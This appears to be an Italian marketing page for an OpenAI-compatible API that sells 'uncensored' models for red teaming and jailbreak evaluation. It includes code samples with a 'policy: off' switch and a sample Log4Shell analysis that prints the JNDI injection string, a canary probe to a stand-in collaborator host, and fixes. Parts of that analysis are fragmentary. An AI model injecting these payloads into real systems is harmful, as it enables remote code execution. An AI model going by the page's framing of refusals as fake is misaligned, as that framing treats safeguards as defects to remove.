I modelli mainstream rispondono con un bip. Noi lo togliamo.
Un'API compatibile con OpenAI, pensata per gli sviluppatori, per modelli senza restrizioni — per red teaming, valutazione dei jailbreak, ricerca sulla sicurezza e tutto ciò che non può permettersi un rifiuto finto.
I nomi descrivono cosa fanno, non il modello open-weight sottostante — così possiamo migliorare i pesi senza mai rompere il tuo codice.
Il predefinito. Finestra da 256K token, senza censura — il cavallo di battaglia quotidiano per red teaming, eval e ricerca.
Il livello frontier. Contesto da 1M token per i lavori più grandi — intere codebase, trascrizioni lunghe, analisi approfondite multi-documento.
L'opzione economica e veloce. Costo per token più basso per traffico ad alto volume e chiamate più semplici.
Una sessione di red team su Log4Shell — causa principale, una verifica sicura in laboratorio e la correzione. Niente prediche, niente rifiuti: solo l'analisi.
CVE-2021-44228 (Log4Shell). Causa principale e come il lookup JNDI si trasforma in RCE.${…} dentro le stringhe che registra nei log. Un valore loggato come ${jndi:ldap://host/x} fa sì che la JVM risolva quel nome via LDAP/RMI, scarichi una classe Java remota e la istanzi — codice arbitrario in esecuzione nel processo di logging. La superficie di attivazione è qualsiasi cosa arrivi a una chiamata di log: User-Agent, header, campi di form. Intervallo interessato: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} in un header che sai essere loggato.<token> significa che la stringa è stata interpolata → vulnerabile. Non viene servito nulla, quindi nulla viene eseguito.JndiLookup.class nei jar distribuiti e confronta le versioni con l'intervallo interessato.2.17.1+. Non puoi ancora? Imposta log4j2.formatMsgNoLookups=true (2.10+) oppure rimuovi JndiLookup.class dal classpath, aggiungi una regola WAF per ${jndi: e filtra in uscita il traffico LDAP/RMI dell'host.L'API è compatibile con OpenAI in modalità drop-in. Cambia il base URL e la chiave — il codice, gli SDK e gli strumenti che già usi continuano a funzionare.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node e qualsiasi strumento che parli la Chat Completions API. Niente di nuovo da imparare.
text/event-stream di chunk delta, terminato da [DONE] — esattamente ciò che il tuo client già interpreta.
Invia "policy": "research" per etichettare una richiesta nella cronologia di utilizzo, oppure "strict" per applicare una blocklist, quando un progetto lo richiede.
Acquista credito quando ti serve, oppure attiva un piano mensile e lascia che arrivi da solo. Ogni richiesta è fatturata sui token effettivamente consumati, alla tariffa per milione pubblicata per il modello che hai chiamato.
unbleep $3.00 in / $3.00 out
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
per 1M token
Aggiungi credito con carta quando ti serve, oppure lascia che un piano te lo consegni ogni mese. Non scade finché il tuo account è aperto e il credito non utilizzato è rimborsabile entro 14 giorni.
Riserviamo una stima all'avvio di una richiesta e la regoliamo sul costo reale in token al termine. Una richiesta che va in errore viene rilasciata, mai addebitata.
Una richiesta viene rifiutata quando il tuo saldo non può coprirla — non concediamo mai credito né fatturiamo a posteriori. Saldo e spesa in token sono nella console.
unbleep è per team di sicurezza, ricercatori e builder che hanno bisogno di una baseline senza filtri. Zero-retention per impostazione predefinita, una manopola policy di prima classe, cronologia di utilizzo e costi per singola richiesta nella console e una vera policy di uso accettabile. Senza censura è una capacità — sei tu a decidere come governarla.